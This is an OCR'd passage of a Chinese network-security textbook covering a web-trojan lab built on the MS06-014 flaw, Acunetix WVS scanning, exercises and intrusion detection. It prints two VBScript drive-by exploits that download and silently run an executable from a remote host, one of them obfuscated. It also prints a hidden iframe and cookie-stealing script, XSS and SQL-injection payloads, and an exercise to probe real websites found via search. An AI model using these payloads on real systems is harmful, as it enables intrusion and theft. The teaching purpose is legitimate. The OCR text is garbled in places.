网 页 木马 一 般 是 利用 客户 端 浏览 器 以 及 插件 的 漏洞 来 获取 攻击 权限 的 ,其 中 以 IE 浏览 
器 被 挂 马 的 数量 最 多 。 例 如 MS06014 漏洞 是 最 著名 的 被 用 来 制作 网 页 木马 的 Windows 系 
统 漏洞 ,该 漏洞 存在 一 个 远程 代码 执行 漏洞 ,成 功利 用 此 漏洞 的 攻击 者 可 以 完全 控制 受 影响 
的 系统 。 

MS06014 漏洞 实际 上 由 至 少 3 种 系统 组 件 配合 引发 。 首 先是 被 大 量 应 用 于 Web 2.0 
交互 的 核心 Ajax 技术 所 需 的 HTTP 数据 请 求 组 件 Microsoft XMLHTTP, 它 被 入 侵 者 设 
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置 为 获取 一 个 网 络 空间 上 放置 的 恶意 木马 程序 ; 接 下 来 该 漏洞 的 主角 Adobe. Stream 将 
XMLHTTP 组 件 获 取 的 数据 写 人 用 户 的 系统 中 ,这 两 个 组 件 的 配合 工作 完成 了 一 次 恶意 程 
序 的 下 载 过程 ;最终 , 人 侵 者 构造 一 个 Shell. APPlication 组 件 将 下 载 完 成 的 恶意 程序 执行 ， 
这 样 就 完成 了 该 漏洞 的 所 有 步骤 。 

【实验 过 程 】 

下 面 是 利用 MS06014 漏洞 的 网 马 程序 。 在 用 户 点 击 浏览 木马 网 页 时 木马 程序 client. 
exe 被 自动 下 载 并 执行 ,其 主要 功能 是 建立 与 服务 程序 的 连接 ,并 将 Cookie 文件 传送 给 服 
务 程序 。 木 马 程序 getandwritecookie. js 的 主要 功能 是 获取 用 户 Cookie 并 保存 至 cookie. 
txt 文件 中 。 服 务 程序 主要 完成 木马 程序 传送 数据 的 接收 。 其 中 BD96C556-65A3-11D0- 
983A-00C04FC29E36 是 MS06014 远程 执行 代码 漏洞 。 


<html> 
< script language= "VBscript"> 

on error resume next 

dl= "http://192.168.8.1/client .exe" 

Set df= document .createElement ("object") 

df.setAttribute "classid", "clsid:BD96C556- 65A3- 11D0- 983A- 00C04FC29E36" 
str= "Microsoft .XMLHTTP" 

Set x= df.CreateObject (str,"") 

al= "Ado" 

a2="db." 

a3= "Str" 

a4= "eam" 

Strl= al&a2&a3&a4 

str5=strl 

set S=df.createobject (str5,"") 

S.type=1 

str6= "GET" 

x.Open str6,dl,False x.Send 

fnamel= "gOld.com" 

set F= df.createobject ("scripting.FileSystemObject","") 

set tmp= F.GetSpecialFolder (2) 

fnamel=F.BuildPath (tmp, fnamel) 

S.open 

S.write x.responseBody 

S.savetofile fnamel,2 

S.close 

set Q= df .createobject ("Shell .Application","") 

createobject ("Shell .Application",""), 

Q.ShellExecute fnamel," 


"open",0 
</script> 
<head><title> Oh,my god!< /title>< /head><body> 
< iframe >src="http://192.168.8.1/ 
getandwritecookie.js" width= "0" height= "0" 
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frameborder="0">< /iframe> 

< center>You DO it!< /center> 
< /body> 

< /html> 

Getandwritecookie. js 如 下 : 


<$Dim fileObject, textFile 

Set fileObject= Server.CreateObject ("Scripting.FileSystemObject") 

Set textFile= fileObject.opentextfile (Server .mappath ("cookie.txt"),8) 
textFile.WriteLine document .cookie 


textFile.close 各 > 


【实验 要 求 】 

(1) 分 析 以 上 木马 程序 ,描述 其 工作 过 程 。 

(2) 判断 实验 环境 是 否 有 MS06014 漏洞 。 

(3) 解释 像 MS06014 远程 执行 代码 漏洞 一 类 的 编码 是 如 何 被 定义 和 获得 的 。 

【实验 思考 】 

(1) 2010 年 网 页 木马 制作 者 利用 最 多 的 漏洞 为 IE 浏览 器 中 的 MS10-018( 国 内 称 “ 极 
风 ”) 和 MS10-002( 即 “极光 ”) ,请 查阅 相关 资料 ,了 解 这 两 个 漏洞 的 编码 和 危害 方式 。 

(2) 讨论 如 何 主动 发 现 Web 漏洞 。 


s.5 Web 漏洞 扫描 技术 


在 第 2 章 中 使 用 过 Nessus、NMAP 等 扫描 器 ,这 些 著 名 的 扫描 器 对 扫描 漏洞 ` 分 析 网 络 
安全 起 到 很 重要 的 作用 。 但 Nessus 是 脆弱 性 评估 工具 ,主要 是 对 主机 、 服 务 器 .网 络 设备 进 
行 扫描 。NMAP 则 倾向 于 端口 等 的 评估 。 对 于 Web 的 安全 问题 则 需要 专业 的 Web 扫描 
器 。Web 扫描 器 可 以 帮助 测试 网 站 系统 中 的 安全 漏洞 ,提前 采取 防范 措施 。 


5.5.1 Web 扫描 器 原理 


漏洞 扫描 软件 最 初 只 是 专门 为 UNIX 系统 编写 的 一 些 只 具有 简单 功能 的 小 程序 ,可 是 
发 展 到 现在 ,已 经 出 现 了 多 个 运行 在 各 种 操作 系统 平台 上 的 具有 复杂 功能 的 商业 程序 。 目 
前 安全 测试 的 软件 越 来 越 多 ,功能 越 来 越 强 大 。 比 较 著名 的 有 全 能 型 扫描 器 WVS( Web 
Vulnerability Scanner) .AppScan、 WeblInspect 等 。 

Web 漏洞 扫描 器 在 工作 时 ,首先 探测 目标 系统 的 活动 主机 ,对 活动 主机 发 送 构造 的 请 
求 数据 ,然后 通过 网 络 应 用 程序 获取 Web 服务 器 的 响应 数据 并 解析 其 内 容 , 浏 览 其 功能 。 
之 后 提取 它 的 每 一 个 参数 ,并 在 每 一 个 参数 中 提交 一 个 测试 字符 串 ,然后 分 析 应 用 程序 的 响 
应 ,从 中 查找 常见 漏洞 的 签名 。 最 后 扫描 器 生成 一 个 报告 ,描述 它 发 现 的 每 一 个 漏洞 。 通 常 
这 份 报告 中 包括 用 于 诊断 每 一 个 被 发 现 的 漏洞 的 请 求 与 响应 ,允许 经 验 丰 富 的 用 户 对 它们 
进行 手工 调查 ,确认 漏洞 是 否 存在 。 

Web 漏洞 扫描 器 是 对 Web 应 用 程序 进行 扫描 检测 。 借 助 Web 漏洞 的 常见 签名 ,对 
Web 应 用 程序 进行 大 量 重复 的 安全 检测 。 从 而 提前 发 现 应 用 程序 中 可 能 存在 的 漏洞 ,做 到 
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早 发 现 . 早 预防 ,从 而 大 幅度 降低 Web 应 用 程序 的 安全 隐患 和 维护 成 本 。 

Web 扫描 器 使 用 一 种 * 疏 虫 ” 技术 。 怜 虫 就 是 一 个 自动 下 载 网 页 的 程序 , 它 是 扫描 引擎 
的 重要 组 成 部 分 。 对 于 一 个 网 站 来 说 ,其 中 的 页 面 , 参 数 众多 ,特别 是 一 些 大 型 网 站 ,内 部 盘 
根 错 节 , 十 分 复杂 。 扫 描 器 需要 寻找 线索 ,一 般 从 URL 开始 ,利用 网 页 的 请 求 都 采用 
HTTP 协议 发 送 ,发 送 和 返回 的 内 容 都 是 统一 的 HTML 语言 的 原理 ,对 HTML 语言 进行 
分 析 , 找 到 里 面 的 参数 和 链接 ,记录 并 继续 发 送 之 ,直到 终止 ,最 后 全 部 找到 网 站 的 页 面 和 目 
录 , 从 而 掌握 网 站 的 结构 。 

然后 ,扫描 器 根据 扫描 规则 库 ( 类 似 于 杀毒 软件 的 病毒 库 ) ,针对 发 现 的 每 个 页 面 的 每 个 
参数 进行 安全 检查 ,实际 是 按照 攻击 类 型 进行 攻击 尝试 .由 此 判断 是 否 存在 安全 漏洞 。 


5.5.2 WVS 扫描 器 


WVS 是 一 款 漏 洞 扫描 程序 。 它 通过 引入 高 级 的 启发 式 发 现 技 术 , 扩 大 了 漏洞 扫描 的 
范围 , 它 可 处 理 基于 Web 环境 的 复杂 安全 问题 。 

WVS 是 一 个 自动 化 的 Web 应 用 程序 安全 测试 工具 , 它 可 以 通过 检查 SQL 注入 攻击 漏 
洞 . 跨 站 脚本 攻击 漏洞 等 来 审核 Web 应 用 程序 。 它 可 以 扫描 任何 可 通过 Web 浏览 器 访问 
的 和 遵循 HTTP/HTTPS 规则 的 Web 站 点 和 Web 应 用 程序 。 除 了 自动 化 地 扫描 可 以 利 
用 的 漏洞 , WVS 还 提供 了 分 析 现 有 通用 产品 和 客户 定制 产品 (包括 那些 依赖 于 JavaScript 
的 程序 , 即 Ajax 应 用 程序 ) 的 一 个 强健 的 解决 方案 。 

WVS 适用 于 任何 中 小 型 和 大 型 企业 的 内 联网 .外 延 网 和 面向 客户 、 雇 员 .厂商 以 及 其 
他 人 员 的 Web 网 站 。 

WVS 拥有 大 量 的 自动 化 特性 和 手动 工具 ,以 下 面 的 方式 工作 : 

(1) 扫描 整个 网 站 。 通 过 跟踪 站 点 上 的 所 有 链接 和 robots. txt( 如 果 有 的 话 ) 实 现 扫描 ， 
然后 映射 出 站 点 的 结构 并 显示 每 个 文件 的 细节 信息 。 

(2) 在 上 述 的 发 现 阶段 或 扫描 过 程 之 后 ,自动 地 对 所 发 现 的 每 个 页 面 发 动 一 系列 漏洞 
攻击 ,这 实质 上 是 模拟 黑客 的 攻击 过 程 。WVS 分 析 每 个 页 面 中 可 以 输入 数据 的 地 方 ,进而 
尝试 所 有 的 输入 组 合 。 这 是 一 个 自动 扫描 阶段 。 

(3) 在 发 现 漏洞 之 后 ,WVS 就 会 在 Alerts Node( 警 告 节 点 ) 中 报告 这 些 漏洞 。 每 个 警 
告 都 包含 着 漏洞 信息 和 如 何 修复 漏洞 的 建议 。 

(4) 在 一 次 扫描 完成 之 后 ,WVS 将 结果 保存 为 文件 以 备 日 后 分 析 以 及 与 以 前 的 扫描 相 
比较 。 使 用 报告 工具 ,就 可 以 创建 一 个 专业 的 报告 来 总 结 这 次 扫描 。 

WVS 自动 地 检查 下 面 的 漏洞 和 内 容 : 

(1) 版 本 检查 。 包 括 易 受 攻击 的 Web 服务 器 以 及 易 受 攻击 的 Web 服务 器 技术 。 

(2) CGI 测试 ,包括 检查 Web 服务 器 的 问题 ,主要 是 决定 在 服务 器 上 是 否 启 用 了 危险 
的 HTTP 方 法 ,例如 PUT、TRACE、DELETE 等 。 

(3) 参数 操纵 。 主 要 包括 跨 站 脚本 攻击 (XSS) .SQL 注入 攻击 、 代 码 执行 ,目录 遍历 攻 
击 .文件 和 人 侵 、 脚 本 源 代 码 泄 漏 、.CRLF 注 和 .PHP 代码 注入 .XPath 注入 .LDAP 注入 、 
Cookie 操纵 .URL 重 定向 、 应 用 程序 错误 消息 等 。 

(4) 多 请 求 参数 操纵 。 主 要 是 检查 Blind SQL / XPath 注入 攻击 。 

(5) 文件 检查 。 检 查 备份 文件 或 目录 ,查找 常见 的 文件 (如 日 志文 件 , 应 用 程序 踪迹 等 ) 
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以 及 URL 中 的 跨 站 脚本 攻击 ,还 要 检查 脚本 错误 等 。 

(6) 目录 检查 。 主 要 查看 常见 的 文件 ,发 现 敏感 的 文件 和 目录 ,发 现 路 径 中 的 跨 站 脚本 
攻击 等 。 

(7) Web 应 用 程序 。 检 查 特定 Web 应 用 程序 的 已 知 漏洞 的 大 型 数据 库 , 例 如 论坛 、 
Web 入 口 .CMS 系统 .电子 商务 应 用 程序 和 PHP 库 等 。 

(8) 文本 搜索 。 检 查 目 录 列 表 、 源 代码 揭示 .电子 邮件 地 址 .MS Office 中 可 能 的 敏感 信 
息 、 错 误 消息 等 。 

(9) GHDB Google 攻击 数据 库 。 检 查 数 据 库 中 1 400 多 条 GHDB 搜索 项 目 。 

(10) Web 服务 。 主 要 是 参数 处 理 ,其 中 包括 SQL 注入 /Blind SQL 注入 ( 即 盲 注 攻 
击 )、 代 码 执行 XPath 注入、 应 用 程序 错误 消息 等 。 

使 用 该 软件 所 提供 的 手动 工具 ,还 可 以 执行 其 他 的 漏洞 测试 ,包括 输入 合法 检查 验证 
攻击 ,缓冲 区 溢出 等 。 

实验 5-4 Acunetix WVS Web 漏洞 探测 

【实验 目的 】 

(1) 了 解 常见 的 Web 网 站 漏洞 及 相应 的 攻击 技术 。 

(2) 掌握 用 Acunetix WVS 进行 Web 漏洞 探测 的 技术 方法 ,并 能 够 对 探测 结果 进行 
分 析 。 

【实验 内 容 】 

(1) 网 站 的 目录 结构 探测 。 

(2) 网 站 的 Web 漏洞 扫描 ,包括 SQL 注入 、 跨 站 脚本 和 验证 页 面 弱 密码 破解 。 

【实验 环境 】 

实验 OS: Windows。 

网 络 环境 :局域网 和 Internet 互联 网 。 

【实验 原理 】 

Web 攻击 通常 包括 了 SQL 注入 、 跨 站 式 脚本 、 人 遍历 目 录 攻 击 、 参 数 自 改 (例如 URL、 
Cookie.HTTP 头 , HTML 表格 ) 、 认 证 攻击 、 目 录 解 析 等 。Web 应 用 程序 一 一 购物 车 、 表 
单 、 登 录 页 面 .动态 内 容 等 一 系列 内 容 设 计 , 让 用 户 可 以 获取 和 提交 包括 了 个 人 信息 和 敏感 
数据 的 动态 内 容 。 

Acunetix Web Vulnerability Scanner( 简 称 WVS) 是 一 种 自动 Web 服务 漏洞 扫描 工 
具 。 它 能 够 扫描 SQL 注入 、 跨 站 式 脚本 攻击 等 安全 漏洞 ,任何 能 够 通过 浏览 器 访问 的 网 站 
或 Web 应 用 程序 都 能 够 被 WVS 扫描 。 除 此 之 外 ,WVS 还 能 对 扫描 结果 进行 分 析 , 并 提供 
基于 JavaScript( 例 如 Ajax) 的 解决 方案 。 

WVS 具有 很 多 自动 扫描 功能 ,整合 了 很 多 的 手动 扫描 工具 ,其 工作 原理 如 下 。 

(1) 网 站 扑 行 。 获 取 整 个 网 站 的 所 有 链接 (包括 读 取 robots. txt 文件 来 访问 网 站 上 的 
受 限 目录 ), 然 后 绘 出 网 站 文件 目录 结构 ,并 给 出 每 个 文件 的 详细 信息 。 

(2) 网 页 漏洞 扫描 。 在 得 到 整个 网 站 的 文件 目录 结构 之 后 ,WVS 通过 模拟 黑客 的 方式 
对 每 个 页 面 进行 漏洞 扫描 ,诸如 输入 不 同 数据 来 检测 是 否 存在 漏洞 。 

(3) 生成 报告 。 找 到 漏洞 之 后 , WVS 会 将 漏洞 放 入 报告 的 Alerts Node( 警 报 点 ) 中 。 
每 个 警报 点 都 包括 了 漏洞 详细 信息 以 及 修复 建议 。 
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(4) 保存 报告 。 所 有 扫描 完成 后 ,可 以 将 扫描 报告 进行 保存 ,以 便 日 后 分 析 。 

WVS 能 够 扫描 的 Web 程序 类 型 包括 ASP、 ASP. NET、 JavaScript、 AJAX、 PHP、 
FrontPage、Perl、JRun、Ruby Flash 和 ColdFusion 等 ,支持 的 Web 服务 器 包括 IIS、Apache、 
Sun Java 和 Lotus Domino 等 。WVS 可 以 扫描 的 漏洞 如 下 : 

(1) 版 本 检测 。 检 测 易 受 攻击 的 Web 服务 器 ,例如 PHP 4. 3.0 文件 和 可 能 的 代码 
执行 。 
(2) CGI 检测 。 检 测 Web 服务 器 上 是 否 使 用 不 安全 的 HTTP 方法 (例如 PUT、 
TRACE 、 DELETE) 。 

(3) 参数 自 改 。 检 测 跨 站 式 脚 本 (XSS)、SQL 注入 .代码 执行 .目录 遍历 .文件 包含 漏 
洞 . 脚 本 源 代码 暴露 .CRLF 注入 /HTTP 响应 拆 分 、 跨 框架 脚本 (XFS) .PHP 代码 注入 、 
XPath 注入 .LDAP 注入 、Cookie 算 改 .URL 重 定向 等 。 

(4) 多 重 请 求 参 数 自 改 。 检 测 Blind SQL/XPath 注入 。 

(5) 文件 .目录 检测 。 检 测 备份 文件 或 目录 (例如 日 志文 件 .CVS 网 站 仓库 等 )、URL 中 
的 跨 站 式 脚本 和 脚本 错误 。 

(6) Web 应 用 程序 检测 。 检 测 大 型 数据 库 漏 洞 ,例如 论坛 .综合 平台 .CMS 系统 等 。 

(7) 文本 搜索 。 搜 索 文 本 ,检测 是 否 包 含 目 录 列 表 、 源 代码 暴露 `.E-mail 地 址 检测 、 本 地 
路 径 暴 露 等 漏洞 。 

此 外 还 有 输入 合法 性 、 认 证 攻击 ,缓存 溢出 等 漏洞 检测 。 

【实验 过 程 】 

(1) 运行 Acunetix WVS 漏洞 扫描 器 。 选 择 菜单 File->New->Web Site Scan 命令 。 然 
后 在 扫描 向 导 对 话 框 中 输入 要 进行 扫描 的 目标 网 站 URL 地 址 ,例如 输入 http://www. 
unknown. com/ (必须 实际 存在 ) , 单 击 Next 按钮 继续 。 

(2) Acunetix WVS 将 会 首先 自动 探测 目标 网 站 的 基本 信息 ,包括 服务 器 Banner 信息 、 
操作 系统 类 型 .优化 所 推荐 的 目标 脚本 程序 类 型 (如 ASP/ASP. NET/P 日 P/Pert/ 等 ), 从 
而 帮助 后 续 的 扫描 任务 。 单 击 Next 按钮 继续 。 

(3) 设 定 网 站 遍历 候 行 的 选项 。 一 般 可 采用 默认 选项 。 单 击 Next 按钮 继续 。 

(4) 设 定 扫描 选项 。 采 用 默认 的 扫描 配置 选项 ,扫描 模式 为 Heuristic( 启 发 式 )。 单 击 
Next 按钮 继续 。 

(5) 设 定 网 站 登录 选项 。 一 般 无 须 设置 ,保持 默认 即 可 。 单 击 Next 按钮 继续 。 

(6) 扫描 选项 设置 完成 后 ,显示 之 前 设置 的 选项 总 结 信息 , 单 击 Finish 按钮 后 开始 
扫描 。 

(7) 扫描 结束 后 ,显示 扫描 结果 。 扫 描 结果 给 出 了 网 站 的 威胁 级 别 、 漏 洞 列表 以 及 探测 
到 的 网 站 文件 目录 结构 等 内 容 。 

(8) 根据 扫描 检测 得 到 报表 进行 以 下 分 析 : 

@ 网 站 目录 结构 的 分 析 。 

@ 漏洞 的 数量 统计 信息 (高 .中 、 低 级 别 的 漏洞 ) 。 

@ 所 有 高 级 别 漏洞 的 详细 信息 。 

@ 所 有 中 级 别 漏洞 的 详细 信息 。 

Q@ 低级 别 漏洞 信息 的 简要 统计 分 析 。 
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【实验 思考 】 

(1) 扫描 器 工作 时 ,向 网 站 发 出 了 什么 请 求 数 据 ? 请 捕获 数据 包 并 对 其 进行 分 析 。 

(2) 在 实验 5-2 中 ,如 果实 验 时 先 使 用 WVS 扫描 其 评论 网 页 ,扫描 器 是 否 能 指出 其 安 
全 隐患 ? 


习 题 5 
1. 选择 题 
(1) 以 下 不 属于 Web 服务 器 的 安全 措施 的 是 ( Ns 
A. 保证 注册 账户 的 时 效 性 B. 删除 死 账户 


C. 强制 用 户 使 用 不 易 被 破解 的 密码 D. 所 有 用 户 使 用 一 次 性 密码 
(2) 以 下 属于 IE 共享 炸弹 的 是 ( ”)。 
A. net use \\192. 168. 0. 1\tanker$ "" /user:"" 
B. \\192.168.0.1\tanker$ \nul\nul 
C. \\192.168.0. 1\tanker$ 
D. net send 192.168.0.1 tanker 
(3) 网 页 病毒 多 是 利用 操作 系统 和 浏览 器 的 漏洞 ,使 用 ( ) 技 术 来 实现 的 。 
A. ActiveX 和 Java B. ActiveX 和 JavaScript 
C. Java 和 HTML D. JavaScript 和 HTML 
(4) 当 用 户 访 问 了 带 有 木马 的 网 页 后 ,木马 的 ( ) 部 分 就 下 载 到 用 户 所 在 的 计算 上 ， 
并 自动 运行 。 


A. 客户 端 B. 服务 端 
C. 客户 端 和 服务 端 D. 客户 端 或 服务 端 
2. 简 答题 


(1) 旨 在 阻止 跨 站 点 脚本 攻击 的 输入 确认 机 制 按 以 下 顺序 处 理 一 个 输入 : 
@ 删除 任何 出 现 的 二 script 二 表达 式 。 

@ 将 输入 截 短 为 50 个 字符 。 

@ 删除 输入 中 的 引号 。 

@ 对 输入 进行 URL 解码 。 

@ 如 果 任 何 输入 项 被 删除 ,返回 步 又 @。 

是 否 能 够 避 开 上 述 确认 机 制 ,让 以 下 数据 通过 确认 ? 


"><script> alert ("foo")< /script> 

(2) 当 解 析 一 个 应 用 程序 时 , 遇 到 以 下 URL: 

https://wahh- app.com/public/profile/Address.asp?action= view&location=default 

据 此 推断 服务 器 端 应 使 用 何 种 技术 .可 能 还 存在 哪些 其 他 内 容 和 功能 。 

(3) 在 登录 功能 中 发 现 了 一 个 SQL 注入 漏洞 ,并 尝试 使 用 输入 ' or 1 一 1 -来 避 开 登录 ， 
但 攻击 没有 成 功 ,生成 的 错误 消息 表明 ,字符 串 被 应 用 程序 的 输入 过 滤 删 除 。 如 何 解决 这 个 
问题 ? 
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3. SQL 注入 攻击 实验 。 

(1) 寻找 并 获得 具有 一 定 权限 的 注入 漏洞 网 站 。 方 法 是 通过 百度 高 级 搜索 功能 ,查找 
内 容 是 具有 黑客 关键 字 的 网 站 链接 地 址 并 且 含 有 asp? 的 网 址 。 

(2) 判断 能 否 进行 SQL 注入。 直接 在 地 址 栏 后 面 加 单 引 号 (7 ,如 果 返 回 出 错 页 面 , 或 
许 存在 注入 点 。 如 果 网 站 管理 员 过 滤 掉 了 单 引 号 , 则 测试 不 到 注入 点 。 

(3) 采用 地 址 栏 猜测 的 方法 并 借助 工具 软件 尝试 少量 .无 害 的 注入 实验 。 

(4) 总 结 注入 攻击 实验 ,对 有 注入 漏洞 的 网 站 提出 防范 SQL 注入 攻击 的 措施 。 

4. 自行 搭建 实验 网 站 ,并 用 多 种 手段 进行 注 和 攻击。 然后 根据 注入 漏洞 加 固 网 站 ,再 
进行 同样 的 攻击 。 比 较 网 站 加 固 前 后 的 攻击 情况 。 攻 击 时 防火 墙 是 否 有 所 反应 ? 

5。Cookies 欺骗 与 防御 实验 。 

实验 目的 : 了 解 Cookies 欺骗 与 防御 的 基本 原理 ,掌握 欺骗 的 几 种 途径 ,学 会 防御 。 

实验 原理 : 自行 写 出 。 

实验 环境 : 自行 写 出 。 

在 Windows 7 或 Windows 8 下 完成 。 

@ 设计 实验 场景 (包括 什么 操作 系统 、 版 本 等 ) ,必要 时 画 出 拓扑 。 

@ 适当 选取 实验 对 象 ,进行 欺骗 ( 详 述 方法 ) ,并 将 其 截图 。 

@ 验证 欺骗 ,观察 防火 墙 对 其 的 反应 情况 ,说 明 原因 。 

Q@ 针对 欺骗 者 设计 防御 方法 ,并 进行 验证 。 

@ 提出 Cookies 欺骗 的 一 般 防 御 策略 。 

@ 写 出 实验 体会 。 

实验 可 以 使 用 相关 工具 软件 ,也 可 以 自行 编写 脚本 程序 。 如 果 是 使 用 工具 软件 , 需 给 出 
其 官网 地 址 ,简要 介绍 其 功能 。 如 果 是 自 编程 序 , 需 写 出 设计 思路 ,给 出 带 注 释 的 代码 清单 。 

6. 使 用 Windows 的 用 户 提出 跨 站 脚本 攻击 的 防范 措施 ,请 按 要 求 完成 下 列 任务 。 

(1) 打开 浏览 器 ,选择 菜单 “工具 ”Internet 选项 ”命令 ,在 “Internet 选项 ”对 话 框 中 ， 
切换 到 “安全 ”选项 卡 ,选择 Internet 图 标 , 单 击 “ 自 定义 级 别 " 按 钮 ,弹出 的 “安全 设置 ”对话 
框 ,在 其 中 自 定义 Internet 安全 级 别 。 找 到 “脚本 ”区 域 ,把 “活动 脚本 "设置 成 “禁用 ”状态 。 

(2) 讨论 步骤 (1) 设 置 的 有 效 性 。 在 这 样 的 设置 下 ,进行 XXS 攻击 实验 ,以 验证 结论 。 

7. 关于 木马 生成 器 ,目前 有 图 片 木 马 生 成 器 .QQ 木马 生成 器 .图片 捆绑 器 .邮箱 及 QQ 
盗号 生成 器 等 ,这 些 软件 都 可 以 通过 网 络 下 载 ,并 且 全 部 是 免费 的 。 你 认为 这 些 随 便 供 人 下 
载 的 木马 生成 器 对 Web 安全 构成 什么 威胁 ? 

8. 从 网 络 上 下 载 火 狐 图 片 木 马 生成 器 软件 ,熟悉 其 使 用 。 通 过 实验 分 析 其 危害 性 ,并 
提出 安全 建议 。 

9. 下 面 是 一 个 MS06014 的 漏洞 测试 程序 ,测试 网 页 http://www. unknow. com/ 
pcsec%5Fbook/test. htm 是 否 存 在 该 漏洞 。 如 果 存 在 该 漏洞 ,访问 这 个 网 页 会 在 用 户 的 机 
器 上 运行 一 个 计算 器 程序 。 


<html> 
<body> 
< script type= "text/jscript"> 
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function init (){ 


document .write ("" 


7} 

window.onload=init; 

</script> 

< script language= "VBScript"> 

On error resume next 

web= "http://www.unknow.com/pcsec%$5Fbook/calc .exe" 
<!-- 这 里 是 放 木 马 程序 的 网 络 路 径 --> 

bt001= 

bt002= "A" 

bt003= "dodb. Stream" 

bt004= "Microsoft." 

bt005= "X" 

bt006= "MLHTTP" 

bt007= "clsid:BD96" 

bt008= "Cn 

bt009= "556- 65A3- 11D0- 983A- 00C04FC29E36" 

bt010= "Scripting.Fil" 

bt011= "e" 

bt012= "SystemObject" 

bt013= " 

bt014= "o" 

bt015= "bject" 

bt016= "cl1" 

bt017: 
bt018= "ssid" 

bt019= "Shell .Applic" 


bt022=bt004&bt005gbt006 
bt023= bt001&bt002&bt003 
bt024= bt007&bt008&bt009 
bt025= bt010gbt011gbt012 
bt026=bt013&bt014&bt015 
bt027=bt016&bt017&bt018 
bt028=bt019&bt020&bt021 
Set y8d4fu= document .createElement (bt026) 
y8d4fu.setAttribute bt027, bt024 
set mlf0e= y8d4fu.createobject (bt025, "") 
set k5x3n= y8d4fu.CreateObject (bt022, "") 
set ufgfh= y8d4fu.CreateObject (bt023,"") 
set u2qo7= y8d4fu.CreateObject (bt028, "") 
set mte4mp=mlf0e.GetSpecialFolder (2) 
ufgfh.type=1 
U3get= "GET" 
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k5x3n .Open u3get, web, False 

k5x3n.Send 

freetou= "system.pif" 
freetou=mlf0e.BuildPath (mte4mp, freetou) 
ufgfh.open 

ufgfh.write k5x3n.responseBody 
ufgfh.savetofile freetou,2 

ufgfh.close 

U2qg07.ShellFExecute freetou,"","","open",0 
</script> 

< /body> 

< /html> 


请 分 析 该 程序 。 如 条 件 允 许 , 分 别 在 有 MS06014 漏洞 和 没有 该 漏洞 的 环境 下 运行 此 程 
序 ,并 说 明 结 果 。 
10. AppScan 是 一 款 优 秀 的 网 站 扫描 器 ,请 下 载 并 安装 此 工具 ,用 它 完 成 实验 5-4。 
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第 6 章 ， 人 入侵 检 测 与 蜜 缸 技术 


在 网 络 安全 问题 上 ,入 侵 检 测 和 蜜 饶 是 两 种 重要 的 技术 ,在 防御 攻击 上 有 其 独到 之 处 。 
本 章 主要 介绍 这 两 种 技术 。 


6.1 人 侵 检 测 


围绕 网 络 安全 问题 ,目前 提出 了 许多 解决 办 法 ,例如 数据 加 密 技 术 和 防火 墙 技术 等 。 数 
据 加 密 是 对 网 络 中 传输 的 数据 进行 加 密 ,到 达 目 的 地 后 再 解密 还 原 为 原始 数据 ,目的 是 防止 
非法 用 户 截获 后 盗用 信息 。 防 火 墙 是 一 种 阻挡 攻击 的 技术 ,通过 对 网 络 的 隔离 和 限制 访问 
等 方法 来 控制 网 络 的 访问 权限 ,一 般 需 要 构建 多 层 防 御 , 攻 击 者 在 突破 第 一 道 防线 后 ,延缓 
或 阻 断 其 到 达 攻 击 目标 ,同时 隐藏 内 部 信息 ,使 攻击 者 不 能 了 解 系统 内 的 基本 情况 。 与 这 些 
技术 相 比 ,入 侵 检 测 系统 是 一 种 主动 式 的 防御 工具 ,根据 网 络 攻 击 的 特征 (或 系统 日 志 上 留 
下 的 信息 ) ,采取 统计 分 析 ( 或 智能 分 析 ) 方 法 来 监控 子 系统 (或 网 络 ) 的 安全 状态 。 入 侵 检 测 
系统 不 仅 能 够 检测 来 自 外 部 的 人 侵 行为 ,也 能 对 系统 内 部 未 授权 的 用 户 行为 进行 监督 。 


6.1.1 入 侵 检 测定 义 


入 侵 检 测 的 概念 是 在 1980 年 由 Anderson 提出 的 ,1987 年 Denning 提出 了 一 种 通用 的 
入 侵 检测 模型 。 入 侵 检 测 (intrusion detection) 对 系统 的 运行 状态 进行 监视 ,是 对 入 侵 行为 
的 发 觉 。 它 通过 从 计算 机 网 络 或 计算 机 系统 的 关键 点 收集 信息 并 进行 分 析 , 从 中 发 现 网 络 
或 系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 ,以 保证 系统 资源 的 机 密 性 、 完 整 性 和 
可 用 性 。 
入 侵 检测 的 软件 与 硬件 的 组 合 便 是 入 侵 检 测 系统 (Intrusion Detection System,IDS)， 
目前 大 部 分 人 侵 检 测 产 品 是 基于 网 络 的 (网 络 和 人 侵 检测 系统 , Network Intrusion Detection 
System, NIDS) ,用 于 实时 监视 网 段 中 的 各 类 数据 包 , 对 每 一 个 数据 包 或 可 疑 的 数据 包 进 行 
分 析 , 能 够 检测 来 自 网 络 的 攻击 。 


6.1.2 入 侵 检测 类 型 


入 侵 检测 系统 根据 检测 对 象 和 工作 方式 的 不 同 , 主 要 分 为 两 大 类 : 基于 主机 的 人 侵 检 
测 系统 和 基于 网 络 的 入 侵 检 测 系 统 。 

1. 基于 主机 的 入 侵 检 测 系统 (IDS) 

基于 主机 的 人 侵 检测 系统 用 于 保护 单 台 主机 不 受 网 络 攻 击 行为 的 侵害 ,入 侵 检测 系统 
安装 在 被 保护 的 主机 上 。 

按照 检测 对 象 的 不 同 , 基 于 主机 的 入 侵 检测 系统 可 以 分 网 络 连接 检测 、 主 机 文件 检测 
两 类 。 

网 络 连接 检测 是 对 试图 进入 该 主机 的 数据 流 进行 检测 ,分 析 确 定 是 否 有 入 侵 行为 ,避免 
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或 减少 这 些 数 据 流 进入 主机 系统 后 造成 的 损害 。 

主机 文件 检测 能 够 帮助 系统 管理 员 发 现 人 侵 行为 或 人 侵 企图 ,及 时 采取 补救 措施 。 这 
主要 是 鉴于 通常 的 入侵 行 为 会 在 主机 的 各 种 相关 文件 中 留 下 痕迹 这 样 的 事实 ,这 些 文件 包 
括 系 统 日 志 、 文 件 系统 .进程 记录 、 系 统 运行 控制 等 。 

基于 主机 的 和 人 侵 检测 系统 具有 检测 准确 度 较 高 (可 以 检测 到 没有 明显 行为 特征 的 人 
侵 ) .针对 性 强 、 成 本 较 低 , 且 不 会 因 网 络 流量 影响 性 能 等 优点 ,但 也 有 实时 性 和 隐蔽 性 差 . 占 
用 主机 资源 等 缺点 ,一 般 适 用 于 加 密 和 交换 环境 。 

2. 基于 网 络 的 入 侵 检 测 系统 (NIDS) 

基于 网 络 的 人 侵 检测 系统 用 原始 的 网 络 包 作为 数据 源 , 它 将 网 络 数据 中 检测 主机 的 网 
